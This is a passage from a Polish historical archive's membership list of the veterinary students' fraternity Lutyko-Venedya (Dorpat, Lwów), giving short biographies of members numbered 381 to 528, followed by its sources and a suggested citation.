 381. Stanisław Rubkiewicz, c. 1896 Lutycja
 382. Tadeusz Rudny, (12 października 1892 w Kamieńsku k. Łęczycy - 1 października 1920 w Czerniewicach na Kujawach) s. Karola i Aleksandry z d. Klajnert-Zapolska, brat przyrodni Mieczysława, stryj Jerzego i Woisława (wszyscy trzej Juventia), student med. Uniwersytet Lwowski, a następnie student i absolwent Akademii Weterynaryjnej we Lwowie, student Instytutu Weterynarii w Dorpacie 1916-18, c. 1916-18 Venedya, por. WP 1918-20, pracował w Wojskowej Pracowni Weterynaryjnej w Warszawie, Laboratorium Bakteriologicznym Ministerstwa Zdrowia Publicznego oraz jako asystent w Zakładzie Bakteriologii i Epizootiologii na Wydziale Lekarskim UW, sekretarz Zarządu Polskiego Towarzystwa Lekarzy Weterynaryjnych 1918-20, w 1920 awansowany na kapitana, pochowany w grobie rodzinnym w Kamieńsku (vide szerzej www.spmk.eu)
 383. Kalikst Rudkowski (Rutkowski), (1867 - ) student i absolwent 1903 Instytutu Weterynaryjnego w Dorpacie, c. 1898 Lutycja, w 1931 lekarz sejmikowy w Daniłowiczach w pow. postawskim
 384. Władysław Rychlicki, c. ok. 1930
 385. Mieczysław Rychlik, c. 1926/27, akt. 1926/27-31

  Mieczysław Rymkiewicz, ok. 1907 r. (?).

 386. Mieczysław Rymkiewicz, (1882-1946) założyciel Venedyi 1907

 387. Marian Rypiński, c. 1925, akt. 1925-27, w 1937 w lekarz wet. w Rzeźni Miejskiej w Nakle
 388. Stanisław Sadkowski, c. 1909-1917 Lutycja
 389. Paweł Sadlek, c. ok. 1930
 390. Saniutycz-Kuroczycki, c. 1914-18 Venedya
 391. Egon K. Saphier (Saperski), (1917 w Wiedniu - 2010) student AMW, c. 1936, akt. 1936-39, sekretarz sem. let. 1938/39, żołnierz AK, powstaniec warszawski w pułku “Baszta”, po wojnie student i absolwent Wydziału Medycyny Weterynaryjnej we Wrocławiu, od 1958 na emigracji w Australii

  Wilhelm Sarrazin, 1934 r.

 392. Wilhelm Sarrazin, (1910 w Nowym Tomyślu - 10 listopada 1970 w Lwówku Wlkp.) student i absolwent 1936 AMW, c. ok. 1930, prezes 50-lecia Lutyko-Venedyi, lekarz wet. w Nowym Tomyślu i we Lwówku

 393. Czesław Sawarecki, członek Venedyi, później w Lutyko-Venedji
 394. Fabian Sawicki, c. 1896 Lutycja
 395. Józef Aleksander Sawicki, (1890 - ) student Instytutu Weterynaryjnego w Dorpacie, a następnie student i absolwent 1923 AMW, członek Venedyi, potem Lutyko-Venedyi, w 1931 wolnopraktykujący lekarz w Warszawie
 396. Michał Sawicki, c. 1894 Lutycja
 397. Eugeniusz Schönborn, (1881 - ) student i absolwent 1912 Instyutu Weterynaryjnego w Dorpacie, najpierw w Venedyi, później w Lutyko-Venedji, w 1931 lekarz powiatowy w Dąbrowie Górniczej
 398. Marian Schultz (Schulc vel Szulc), (1905 w Wąbrzeźnie - ) student i absolwent 1934 AMW, akt. 1927-34
 399. Piotr Selens, c. 1888 Lutycja
 400. Eugeniusz Severin (Seweryn), (1876 - ) student i absolwent 1899 Instytutu Weterynaryjnego w Dorpacie, c. 1895 Lutycja, dr wet., w 1931 pracownik państwowej stadniny ogierów w Kozienicach
 401. Mikołaj Severin, c. 1890 Lutycja
 402. Władysław Siejak, ( - przed 1970) student AMW, jeden z pierwszych członków Venedyi we Lwowie, potem w Lutyko-Venedyi, akt. 1921-24
 403. Teobald Skarżyński, (1893-1957) student Instytutu Weterynaryjnego w Dorpacie, c. 1914 Venedya, student i absolwent 1932 AMW, wieloletni kierownik biblioteki AMW [zob. Skarżyński Teobald (1893-1957), (w:) Konrad Millak, Słownik polskich lekarzy weterynaryjnych biograficzno-bibliograficzny 1394-1918, Warszawa 1963, Warszawa, s. 215-216]
 404. Leonard Skobiński, c. 1887 Lutycja
 405. Czesław Skorski, (28 marca 1913 w Sochowoli pow. Sokółka - 15 sierpnia 1994 w Gdańsku) s. Antoniego i Pauliny, absolwent Gimnazjum w Wąbrzeźnie 1934, student AMW 1936-39, akt. 1938-39, skarbnik sem. zim. 1938/39, kapral podchorąży w wojnie obronnej 1939, więziony w radzieckim więzieniu w Białymstoku, w konspiracji w AK, więziony przez Niemców na Pawiaku 1944 i zesłany do obozu w Gross-Rosen 1944-45, po wojnie kierownik majątku doświadczalnego UWr. 1945-48, student i absolwent Wydziału Medycy Weterynaryjnej Uniwersytetu i Politechniki we Wrocławiu 1948-49, lekarz wet., kierownik sekcji kontroli technicznej “Bacutil” przy R.P.P. Odpadków Zwierzęcych i Roślinnych w Warszawie 1949-55, kierownik lecznicy dla zwierząt w Mierzeszynie w Gdańskim 1955-78, wykładowca w Szkole Przysposobienia Rolniczego 1957-70, radny w Gminnej Radzie Narodowej w Trąbkach Wielkich (1973-77, 1984-88, 1990-94), odznaczony m.in. Złotym Krzyżem Zasługi 1947, Medalem Zwycięstwa i Wolności 1947, Krzyżem Kawalerskim OOP 1979, Krzyżem Oświęcimskim 1987, Odznaką za Wzorową pracę w służbie weterynaryjenj 1976 oraz Odznaką “Zasłużony dla Ziemi Gdańskiej” 1978
 406. Edward Skrzeszewski, c. 1887 Lutycja, w początku XX wieku naczelnik oddziału w Baku, w 1925 inspektor weterynarii w Białymstoku
 407. Tadeusz Sobolewski, (1900 - 16 marca 1947) student i absolwent 1928 AMW, akt. 1925-27, w 1931 lekarz miejski w Hrubieszowie
 408. Wiktor Sobolewski, c. 1886 Lutycja
 409. Kazimierz Andrzej Antoni Sokołowski, (18 lutego 1906 w Nowej Wsi w pow. wieluńskim - 1940 w Katyniu) s. Stanisława i Anny z Nowackich, student AMW, student i absolwent weterynarii UW, c. 1926/27, wiceprezes 1930, mieszkał i prowadził praktykę weterynaryjną w Wieluniu, absolwent Szkoły Podchorążych Rezerwy Kawalerii w Grudziądzu, ppor. rez., przydzielony do 7 Pułku Artylerii Lekkiej, w niewoli sowieckiej, zamordowany przez NKWD
 410. Bolesław Somkowicz, c. 1891 Lutycja
 411. Zbigniew Sozański, student AMW, akt. 1938-39
 412. Zbigniew Speidel, c. ok. 1930
 413. Gerard Spitter (Szpitter), c. 1934, akt. 1934-38, sekretarz sem. let. 1934/35 oraz 1937/38
 414. Tadeusz Stalmach, akt. 1938/39
 415. Wacław Stankiewicz, c. 1896 Lutycja
 416. Feliks Starosta, c. ok. 1930
 417. Adam Stasinowski, (1882 - ) student i absolwent 1908 Instyutu Weterynaryjnego w Dorpacie, c. 1903 Lutycja, w 1931 lekarz wolnopraktykujący w Płońsku
 418. Stecha, akt. 1938/39
 419. Konrad Stellmach, (1911 we Lwowie - 1971 w Koronowie) student i absolwent 1935 AMW, c. ok. 1930
 420. Stanisław Stempowski, (27 stycznia 1870 w Hucie Czernielewieckiej w gub. podolskiej - 1952 w Warszawie) z rodziny ziemiańskiej, c. 1888 Lutycja, po krótkim czasie przestał być aktywny i zaangażował się w działalność socjalistyczną, redaktor, tłumacz, i literat, działacz polityczno-społeczny, po I wojnie światowej wysoki dygnitarz masoński, autor pamiętników (Ossolineum 1953)
 421. Witold Stodolnicki, c. 1907 Lutycja, prezes Koła Filistrów Lutycji 1921, podpisał unię z Venedyą tworzącą Lutyko-Venedyę
 422. Eugeniusz Strzelczyk, c. ok. 1930
 423. Ludwik Symon, (25 sierpnia 1865 - ) c. 1886 Lutycja, płk wet.
 424. Janusz Szajewski, najpierw w Venedyi, a następnie w Lutyko-Venedyi
 425. Jan Szalkiewicz, (1884 - ) student i absolwent 1911 Instytutu Weterynaryjnego w Dorpacie, c. II sem. 1909 Venedya, oficer zawodowy
 426. Filip Szczeniowski, c. 1885 Lutycja
 427. Jerzy Szenajch, c. II sem. 1907 Venedya
 428. Kazimierz Szkuta, student AMW, c. 1938/39
 429. Teofil Szmelichowski, akt. 1931
 430. Jerzy Szmurło, (23 kwietnia 1884 - 1963) student i absolwent 1916 Instytutu Weterynaryjnego w Dorpacie, c. II sem. 1908 Venedya, kpt. wet., w 1931 lekarz wolnopraktykujący w maj. Klepacze w pow. brzeskim
 431. Mieczysław Szmurło, c. II sem. 1907 Venedya
 432. Jerzy Szołkowski, założyciel Lutycji 1884
 433. Kazimierz Szukiewicz, (1874 - ) student i absolwent 1898 Instytutu Weterynaryjnego w Dorpacie, c. 1893 Lutycja, w 1931 lekarz wolnopraktykujący w Oszmianie

  Jan Szukszta, prawd. 1935 r.

 434. Jan Marcin Tadeusz Szukszta, (1862 - 1 stycznia 1939 w Inowrocławiu) student i absolwent 1888 Instytutu Weterynaryjnego w Dorpacie, założyciel Lutycji, dr wet., działacz narodowy, do 1925 w rodzinnym maj. Michaliszki pow. Poniewież na Litwie kowieńskiej, odznaczony Dyplomem Zasługi i Złotą Odznaką ZPKA, inicjator rozłamu w Grunwalidii 1934 oraz w Lutyko-Venedyi 1935 i odnowienia Lutycji, pochowany w grobowcu rodzinnym w Warszawie [zob. Szukszta Jan Marcin Tadeusz (1862-1940?), (w:) Konrad Millak, Słownik polskich lekarzy weterynaryjnych biograficzno-bibliograficzny 1394-1918, Warszawa 1963, s. 234]

  Ignacy Szumski

 435. Ignacy Szumski, (1868 w Isernie k. Słucka - 6 grudnia 1942 w Międzylesiu), s. Wilhelma (administratora majątków ziemskich) i Wilhelminy, absolwent Gimnazjum w Słucku, student i absolwent Instytutu Weterynaryjnego w Dorpacie, c. 1886 Lutycja, jako lekarz weterynarii delegowany do walki z nosacizną u koni na Kaukazie, następnie pracuje w rzeźni w Kijowie, a później jako księgowy w przedsiębiorstwie przemysłowo-handlowym w Talicy na Syberii, w czasie wojny japońskiej na froncie w stopniu ppłk. 1904/5, odznaczony orderem św. Stanisława, następnie jako urzędnik pracuje w monopolach w Permie, w czasie I wojny światowej na froncie w Karpatach, po zachorowaniu na tyfus wysłany do Turkiestanu, a później do Samarkandy, gdzie zorganizował duży lazaret koni na potrzeby wojska, w 1921 wrócił do Polski, zamieszkał w miejscowości Kaczy Dół [obecnie Międzylesie] pod Warszawą, do emerytury pracował w Najwyższej Izbie Kontroli [Źródła (poza wskazanymi poniżej spisu członków): relacja Mieczysława Szumskiego na podstawie pamiętnika Józefa Szumskiego, syna Ignacego]

 436. Łucjan Szwarc student AMW, c. 1938/39
 437. Kazimierz Szyberna, (1909 w Miejskiej Górce k. Rawicza - ) w 1937 lekarz wet. w Miejskiej Górce pow. Rawicz
 438. Bronisław Szykier, c. II sem. 1907 Venedya
 439. Józef Śledziewski, c. 1886 Lutycja
 440. Władysław Śleżanowski, c. 1894 Lutycja
 441. Antoni Śliwa, (1915 - ok. 1945) student i absolwent 1939 AMW, akt. 1935-39, sekretarz 1936, wiceprezes 1937, prezes sem. zim. 1938/39, I wiceprezes sem. let. 1938/39, zamordowany przez UPA na Wołyniu
 442. Romuald Włodzimierz Benedykt Śliwiński, (1909 w Jarocinie - 26 stycznia 1984) student i absolwent AMW, fuks w Lutyko-Venedyi, przeszedł do Icarii, adiunkt AMW
 443. Tadeusz Śliwiński, (1915 - ) student AMW, akt. 1938-39, student i absolwent 1943 wet. Lwów
 444. Jan Ślizień, (31 lipca 1891 prawd. w Warszawie - 24 września 1913 w maj. rodzinnym w Drućkowszczyźnie k. Nieświeża lub w Grudce) s. Jana i Eleonory z Kunickich, student prawa UD, c. 1911 Venedya (stały gość), zmarł tragicznie po omyłkowym wypiciu kwasu solnego, pochowany na cmentarzu w Drućkowszczyźnie
 445. Zygmunt Śniegocki, akt. 1925-27
 446. Ludwik Śróbka, (1909 - 1973 w Łasinie w Bydgoskim) student i absolwent 1937 AMW
 447. Paweł Świątkiewicz, c. 1886 Lutycja
 448. Mikołaj Świderski, ( - 1940 w “Katyniu”) c. 1894 Lutycja, w 1939 walczył w Armii Pomorze (?), mjr, figuruje na tzw. Ukraińskiej Liście Katyńskiej
 449. Stanisław Świerzewski, ojciec Witolda (Polesia), student med. UD, członek Lutycji, lekarz
 450. Józef Święch, c. ok. 1930
 451. Jan Święcicki, (1901 w Bobrownikach - 30 września 1945 w Toruniu) herbu Jastrzębiec, s. Tadeusza i Jadwiki z d. Gockowska, Kazimierz i Stanisław (obaj Jagiellonia), akt. 1925-27, prezes, olderman
 452. Bronisław Świtajski, (1904 w Tucholi - 1978 we Włocławku) student i absolwent 1931 AMW, c. 1925, akt. 1925-27
 453. Aleksander Tamlin (Tamilin?), (1892 - ) student i absolwent 1922 AMW, w 1931 lekarz miejski w Łodzi
 454. Bolesław Taniewski, (1870 - ) student i absolwent 1896 Instytutu Weterynaryjnego w Dorpacie, c. 1892 Lutycja, w 1931 naczelnik Wydziału w Urzędzie Wojewódzkim w Nowogródku
 455. Leon Tarnowski, c. 1889 Lutycja
 456. Stanisław Terlecki, student AMW, akt. 1938-39, sekretarz sem. zim. 1939/40 (ostatnie Prezydium przed wojną)
 457. Jan Terpiłowski, (1896 - 14 października 1928 w Ostrowcu Świętokrzyskim) akt. 1922-27, prezes 1922/23 oraz sem. let. 1924/25, organizator i pierwszy prezes 1923/24 LKM-u, nabożeństwo żałobne z udziałem wszystkich korporacji lwowskich w kościele Św. Mikołaja 30 października 1928, pośmiertnie odznaczony Dyplomem Zasługi i Złotą Odznaką ZPKA
 458. Karol Tomaszewski, c. 1892 Lutycja
 459. Władysław Topolski, student AMW, c. 1938/39
 460. Antoni Towroszewicz, c. 1893 Lutycja
 461. Zygmunt Truskowski, (1866 - ) student i absolwent 1897 Instytutu Weterynaryjnego w Dorpacie, c. 1892 Lutycja, w 1931 referendarz w Urzędzie Wojewódzkim w Brześciu n/Bugiem

  Tadeusz Tryliński, prawd. koniec XIX w.

 462. Tadeusz Tryliński, (23 maja 1877 w Rosieniach - 23 sierpnia 1944 w Milanówku ) s. Antoniego i Agnieszki z d. Zawadzkiej, absolwent Gimnazjum w Rewlu, student i absolwent 1900 Instytutu Weterynaryjnego w Dorpacie, c. 1896 Lutycja, od 1903 lekarz wet. w armii rosyjskiej, lekarz wet. WP 1919-27, od 1919 w randze podpułkownika, zginął zastrzelony przez niemieckiego żołnierza, według relacji rodziny w czasie powstania warszawskiego na pytanie poszukującego określonej grupy Polaków niemieckiego żołnierza “Wo sind diese Banditen” miał nie wytrzymać i odpowiedzieć “Du bist auch Bandit”, a następnie uderzyć Niemca w twarz, za co tamtem wyciągnął pistolet i go zastrzelił, pochowany na Cmentarzu w Milanówku, na płycie nagrobnej widnieje napis: „Zginął w obronie honoru Polaka.”

 463. Józef Trzciński, c. 1894 Lutycja
 464. Stefan Trzebiński, (1885 - 1948) - student prawa, stały gość w Venedyi 1907, c. II sem. 1907 Konwent Polonia [nr ew. 1191], w I korpusie WP (l. 1917 -18), płk, d-ca 3. Dyw. Art. Konnej (1918 - 31), odznaczony Virtuti Militari i Krzyżem Walecznych (dwukrotnie)
 465. Wincenty Turmaga (?), c. 1925
 466. Hugon Tymiński, (1 kwietnia 1883 w Wołkowysku - 1939 w Wołkowysku) s. Andrzeja, dyplom pomocnika aptekarskiego Uniwersytet Moskiewski, członek Lechicji w Dorpacie, stały gość Venedyi 1907, prowizor UD 1909, właściciel apteki w Wołkowysku, rozstrzelany przez NKWD
 467. Jan Tytz, student teologii UD, c. 1911 Venedya (stały gość)
 468. Wincenty Twarianowicz, c. 1885 Lutycja
 469. Czesław Uciechowski, (1914 - ) student i absolwent 1933 AMW, akt. 1931
 470. Michał Urbanowicz, c. II sem. 1911 Venedya
 471. Leon Walter, (1892 - ) student i absolwent 1920 AMW, jeden z pierwszych Venedów we Lwowie, w 1931 lekarz powiatowy w Ostrowie Mazowieckim
 472. Marian Wardyński, (2 lutego 1912 w Milatynie Nowym pow. Kamionka Strumiłowa - 18 listopada 1967 w Dębicy) student i absolwent AMW 1932-39, najpierw w Lutyko-Venedyi, w 1935 przeszedł do Lutycji nowej, pochowany na Cmentarzu Rakowickim w Krakowie
 473. Roman Wargacki, (1912 - 1964 w Poznaniu) student AMW, akt. 1937-39, II wiceprezes sem. zim. oraz sem. let. 1938/39, prezes sem. zim. 1939/40 (ostatnie Prezydium przed wojną), dpl. 1945
 474. Eugeniusz Warnicki, (5 stycznia 1899 - ) student i absolwent 1926 AMW, najpierw w Venedyi, potem w Lutyko-Venedyi, oficer zawodowy, kpt. WP, w wojnie obronnej 1939 szef służby wet. 25 Dywizji Piechoty Armii “Poznań”, m.in. uczestnik obrony Warszawy
 475. Jan Wasiutyński-Lechno, c. 1890 Lutycja
 476. Józef Wasiutyński-Lechno, c. 1889 Lutycja
 477. Witold Wawrzynowicz, (1907 - 1976 w Książu Wlkp.) student i absolwent 1934 AMW, akt. 1931, sekretarz sem. zim. 1930/31, wiceprezes sem. let. 1930/31
 478. Józef Weight (Weigt), (5 lutego 1906 w Jankowie Zaleśnym w pow. ostrowskim - 1940 w Charkowie) s. Stanisława i Zofii z Rosochowiczów, członek Towarzystwa Tomasza Zana i drużyny skautowej, uczestnik powstania wielkpolskiego, student i absolwent 1931 AMW, c. 1925, akt. 1925-27, dr wet., lekarz w Janowcu, kierownik rzeźni w Mogilnie pow. Żnin, ppor. rez.,przydzielony do 21 Pułku Ułanów, w niewoli sowieckiej w Starobielsku, zamordowany przez NKWD
 479. Adam Weiss, c. 1926/27
 480. Antoni Werka, (1909-2003) student i absolwent 1935 AMW, wiceprezes 1932/33
 481. Bronisław Weselski, (1873 - ) student i absolwent 1897 Instytutu Weterynaryjnego w Dorpacie, c. 1893 Lutycja, w 1931 lekarz powiatowy w Brzezinach w woj. łódzkim
 482. Stanisław Wędrychowicz, (1906 w Poznaniu - ok. 1980) akt. 1926-28, olderman 1927/28, lekarz powiatowy w Gnieźnie, po wojnie pracował w Centrowecie w Poznaniu, wykładowca AR w Poznaniu
 483. Karol Węglorz, pochodził z Cieszyna
 484. Władysław Wilski, c. 1891 Lutycja

  Tadeusz Winiecki, 1931/32 r.

 485. Tadeusz Winiecki, (1908 w Tarnowie Podgórnym - 1989) brat Stefana (Scythia), student i absolwent 1934 AMW, akt. 1930-32, olderman 1930-32, m.in. sem. let. 1930/31 oraz sem. zim. 1931/32, w 1937 lekarz wet. w Tarnowie Podgórnym, w 1938 prezes Poznańskiego Koła Filistrów

 486. Henryk Wińcza, c. 1885 Lutycja
 487. Bazyli Wiszniewski, (1869 - ) student i absolwent 1893 AMW, c. 1889 Lutycja, w 1931 lekarz sejmikowy w Radomiu
 488. Paweł Wiszniewski, c. 1891 Lutycja
 489. Kazimierz Witkowski, (9 marca 1884 w Balbierzyszkach - 1940 w Charkowie) s. Władysława, student i absolwent 1910 Instytutu Weterynaryjnego w Dorpacie, c. 1907 Lutycja, w 1931 lekarz powiatowy w Suwałkach, kpt. WP, w wojnie obronnej 1939 w 3 Okręgowym Szpitalu Koni, w niewoli sowieckiej, zamordowany przez NKWD
 490. Władysław Witkowski, akt. 1925-27
 491. Nikodem Witort, c. 1889 Lutycja
 492. Czesław Witowski, (1886 - ) student Instytutu Weterynaryjnego w Dorpacie, c. II sem. 1910 Venedya, student i absolwent 1912 Szkoły Weterynaryjnej we Lwowie, w 1931 lekarz miejski we Lwowie
 493. Józef Wittchen, student AMW, c. 1938/39
 494. Karol Wodzinowski, c. 1908 Lutycja
 495. Jan Wojnarowski, c. 1926/27

  Mieczysław Woydatt

 496. Mieczysław Woydatt, (11 marca 1887 w Lelerwiszkach na Litwie - 5 września 1961 w Milejowie k. Lublina) student i absolwent 1912 Instytutu Weterynaryjnego w Dorpacie, c. II sem. 1911 Venedya, w 1931 lekarz sejmikowy kol. Milejów w pow. Lubelskim

 497. Domarat Woyno, student prawa UD, c. 1908 Venedya (stały gość)
 498. Franciszek Wójtowicz, c. 1926/27, akt. 1926/27-31, prezes sem. zim. 1930/31
 499. Józef Wróblewski, c. 1907 Lutycja
 500. Konrad Wróblewski, (1866-1947) student i absolwent 1893 AMW, c. 1889 Lutycja, badacz żubra w Puszczy Białowiejskiej, autor pracy „Żubr Puszczy Białowieskiej” (1927), w 1931 emerytowany lekarz w Brześciu n/Bugiem
 501. Stefan Wróblewski, akt. 1925-27
 502. Bernard Wróż, student AMW, c. 1938/39
 503. Bolesław Wrzask, c. ok. 1930
 504. Bogdan Wrzyszczyński, (1 listopada 1901 w Łopiszewie k. Ryczywołu w pow. obornickim - 11 września 1968 w Poznaniu) s. Kazimierza i Marii z d. Rontz, brat Stanisława (Baltia), uczestnik powstania wielkpolskiego 1918-19, absolwent Gimnazjum im. K. Marcinkowskiego w Poznaniu, student med. UP, członek Baltii, student i absolwent AMW 1924-28, a następnie asystent AMW, członek Lutyko-Venedyi, dyrektor Rzeźni Miejskiej i Eksportowej w Toruniu 1930-39, por. rez., uczestnik wojny obronnej 1939, więzień obozu jenieckiego VII A w Murnau 1939-45, po wojnie pracownik UNRA w Niemczech 1945-47, w 1947 wrócił do kraju, dr wet. Wydział Medycyny Weterynaryjnej we Wrocławiu 1949, dyrektor Przedsiębiorstwa Zaopatrzenia Weterynaryjno-Zootechnicznego “Centrowet” w Poznaniu, odznaczony Srebrnym Krzyżem Zasługi oraz Krzyżem Powstańców Wielkopolskich, pochowany na Cmentarzu Junikowskim w Poznaniu (grób R-1-A-98)
 505. Antoni Wyrzykowski, (1873 - ) student i absolwent 1908 Instytutu Weterynaryjnego w Dorpacie, c. 1903 Lutycja, w 1931 lekarz powiatowy we Włodawie
 506. Józef Wyrzykowski, (1862 - ) student i absolwent 1893 Instytutu Weterynaryjnego w Dorpacie, c. 1886 Lutycja, w 1931 emerytowany lekarz w Brześciu n/Bugiem
 507. Henryk Wysocki, c. 1896 Lutycja
 508. Wzorek,
 509. Juliusz Zabielski, (1885-1925) c. 1907 Lutycji, założyciel Venedii 1907
 510. Zaleski, członek Venedyi, potem w Lutyko-Venedyi, przewodniczący Komisji Statutowej podczas II Zjazdu ZPKA w Poznaniu w 1922
 511. Piotr Zankiewicz, c. 1897 Lutycja
 512. Stanisław Zapolski - Downar, c. 1892 Lutycja
 513. Zbigniew Zaremba, student AMW, akt. 1938-39
 514. Alojzy Zawadzki, c. 1925, akt. 1925-27
 515. Jan Zawidzki, (1886 - ) student i absolwent 1910 Instytutu Weterynaryjnego w Dorpacie, c. 1908 Lutycja, w 1931 lekarz powiatowy w Grójcu
 516. Janusz Zawitaj, c. 1930, sekretarz 1932/33
 517. Karol Zdanowicz, c. 1886 Lutycja
 518. Jan Zdanowski, c. 1890 Lutycja
 519. Ginter Ziegert, (w Toruniu - ) s. Franciszka, akt. 1937-39, po wojnie na emigracji w Ameryce Południowej
 520. Władysław Zienkiewicz, założyciel Lutycji 1884
 521. Zygadło,
 522. Józef Zygmunt, (1915 w Zbąszyniu - 1979 w Opocznie ?) student AMW, akt. 1938-39, dpl. 1950
 523. Romuald Żakiewicz, c. 1894 Lutycja
 524. Antoni Żebracki, (1914 - 29 stycznia 1998) c. 1934/5, akt. 1934-39, sekretarz 1937, wiceprezes 1938, prof. medycyny weterynaryjnej AR w Olsztynie, klinicysta
 525. Aleksander Żenczykowski, c. 1886 Lutycja
 526. Aleksander Żukowski, c. 1886 Lutycja

  Tadeusz Żuliński, 1929 r.

 527. Tadeusz Żuliński, (1910 we Lwowie - 1967) uczeń Gimnazjum w Rzeszowie, student i absolwent 1933 AMW, akt. 1929-31, c. 1929, po wojnie prof. UMCS

 528. Roman Żurowski-Leliwa, ( - 22 stycznia 1928 we Lwowie) c. 1926/27, pogrzebany z ceremoniałem korporacyjnym

Pieczęć Lutyko-Venedyi, 1935 r.

Listę członków opracowano na podstawie:

1) Konrad Millak, Polskie stowarzyszenia studentów weterynarii w Dorpacie do 1918 roku, (w:) Zeszyty Naukowe SGGW - Seria Historyczna, z. 2, Warszawa 1965, s. 93 i n.,
2) Zbysław Popławski, Lista członków Polskiej Korporacji Akademickiej Lutyko-Venedya (Lwów), (w:) Polskie Korporacje Akademickie 1996, nr 11, s. 34 i n.,
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Lutyko-Venedya.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 5 XII 2022 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Studentów Akademii Medycyny Weterynaryjnej Lutyko-Venedya (Dorpat, Lwów), (na:) www.archiwumkorporacyjne.pl, stan 5 XII 2022 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }